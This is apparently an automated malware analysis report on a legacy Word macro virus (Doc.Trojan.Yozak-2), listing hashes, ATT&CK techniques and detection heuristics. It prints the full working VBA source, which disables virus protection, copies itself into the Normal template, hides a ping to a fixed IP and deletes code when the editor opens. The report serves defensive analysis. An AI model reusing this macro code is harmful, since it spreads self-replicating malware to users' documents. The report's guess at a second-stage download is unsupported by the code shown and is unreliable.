Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 34e476486768ab42…

MALICIOUS

Office (OLE)

32.5 KB Created: 1999-04-03 17:02:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 408541107579e732be5faa84992a22d2 SHA-1: 8450b330408003bb7ae6972f5c58092d0c3b9bf6 SHA-256: 34e476486768ab429c16224649c3578a102fbd928a5f5008f7f46c3da1e6b9a1
300 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains a VBA macro with an autoopen subroutine that executes a Shell command. This command uses 'ping.exe' to contact the IP address '22.22.22.222' with a large count, suggesting a potential download or execution of a second-stage payload. The ClamAV detection 'Doc.Trojan.Yozak-2' further supports the malicious nature of the file.

Heuristics 6

  • ClamAV: Doc.Trojan.Yozak-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Yozak-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2371 bytes
SHA-256: 7fc141e7da51d61bb9f5a7b436a2ea44e0e9f076ec7d7e3661b80a47da9c3a62
Detection
ClamAV: Doc.Trojan.Yozak-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Sub Alpha.b()
Sub autoopen()
On Error Resume Next
Application.DisplayAlerts = wdAlertsNone
Application.DisplayRecentFiles = False
Application.EnableCancelKey = wdCancelDisabled
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
CommandBars("Tools").Visible = False
If NormalTemplate.VBProject.VBComponents(2 - 1).CodeModule.Lines(1, 1) = "'Sub Alpha.b()" Then
ntii = 101
Else
ntii = 100
End If
If ActiveDocument.VBProject.VBComponents(2 - 1 + 1 - 1).CodeModule.Lines(1, 1) = "'Sub Alpha.b()" Then
adii = 101
Else
adii = 100
End If
If adii = 100 And ntii = 101 Then
a = NormalTemplate.VBProject.VBComponents(2 - 1).CodeModule.Lines(1, 50)
ActiveDocument.VBProject.VBComponents(2 - 1).CodeModule.DeleteLines 1, 1000
ActiveDocument.VBProject.VBComponents(2 - 1).CodeModule.AddFromstring a
ElseIf adii = 101 And ntii = 100 Then
a = ActiveDocument.VBProject.VBComponents(2 - 1).CodeModule.Lines(1, 50)
NormalTemplate.VBProject.VBComponents(2 - 1).CodeModule.DeleteLines 1, 1000
NormalTemplate.VBProject.VBComponents(2 - 1).CodeModule.AddFromstring a
End If
If Month(Now) = Int(12 * Rnd) Then
Selection.TypeText "Stop bomb attacks in KOSOVO NOW!!!"
Selection.TypeText "Somebody stop NATO-AMERICANS before it is TOO late"
Selection.TypeText ""
Selection.TypeText "Peace from Greece with love"
Selection.TypeText "Alpha.b Project form Dr.yozak"
Selection.TypeText "<-FREE OTCHALAN->"
Shell "c:\windows\ping.exe 22.22.22.222 -n " & Int(600000 * Rnd), vbHide
ActiveDocument.Save
ActiveDocument.AddToFavorites
MsgBox "-Greetz to the VX scene from Dr.yozak-"
MsgBox "-peace all over earth-" & vbCr & " Don't Bust VXers they write virii to gain knowledge" & vbCr & "Alpa.b Ptoject from 3C labs", vbApplicationModal, "Alpha.b dedicated to World Peace"
End If
End Sub
Sub viewvbcode()
On Error Resume Next
NormalTemplate.VBProject.VBComponents(10 - 9).CodeModule.DeleteLines 1, 50
NormalTemplate.Saved = False
ActiveDocument.VBProject.VBComponents(100 - 99).CodeModule.DeleteLines 1, 50
Application.ShowVisualBasicEditor = True
End Sub